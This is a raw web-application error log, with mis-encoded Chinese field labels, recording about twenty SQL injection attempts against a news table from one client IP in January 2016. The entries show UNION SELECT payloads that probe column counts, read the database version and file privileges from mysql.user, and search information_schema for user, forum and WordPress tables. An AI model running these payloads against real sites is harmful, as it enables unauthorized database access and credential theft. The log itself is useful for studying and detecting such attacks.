щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='831111111111111' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by 'as /*'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:41

щФЩшппSQLшпнхПея╝Ъ
SELECT nid,ntitle FROM news  Where nid<'831111111111111' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by 'as /*' and nstatus=1 order by nid desc limit 1
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:41

щФЩшппSQLшпнхПея╝Ъ
SELECT nid,ntitle FROM news  Where nid>'831111111111111' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by 'as /*' and nstatus=1 order by nid asc limit 1
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:41

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='831111111111111' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by 'as /*'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:42

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(100,100,100),CHAR(91,88,93),vErsion(),CHAR(91,88,88,93)),2  limit 0,1 -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:43

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(100,100,100),CHAR(91,88,93),vErsion(),CHAR(91,88,88,93)),2  limit 0,1 -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:44

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(100,100,100),CHAR(91,88,93),file_priv,CHAR(91,88,88,93)),2 FROM mysql.user limit 0,1 -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:45

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%wp_users%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:50

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%user%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:52

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%usr%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:53

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%phpbb%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:54

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "╗%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:55

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "нm%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:56

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%member%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:57

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%forum%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:58

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%reg%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:09:59

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%moder%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:10:00

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%ftp%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:10:01

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%jos%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:10:02

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "мces%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:10:03

щФЩшппSQLшпнхПея╝Ъ
SELECT * FROM news  Where nid='8311111111111111111111111111' UNION SELECT CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13 FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE "%wso%"   -- /* order by 'as'
ховцИ╖IP:74.208.194.50
цЧ╢щЧ┤ :2016-01-12 05:10:04

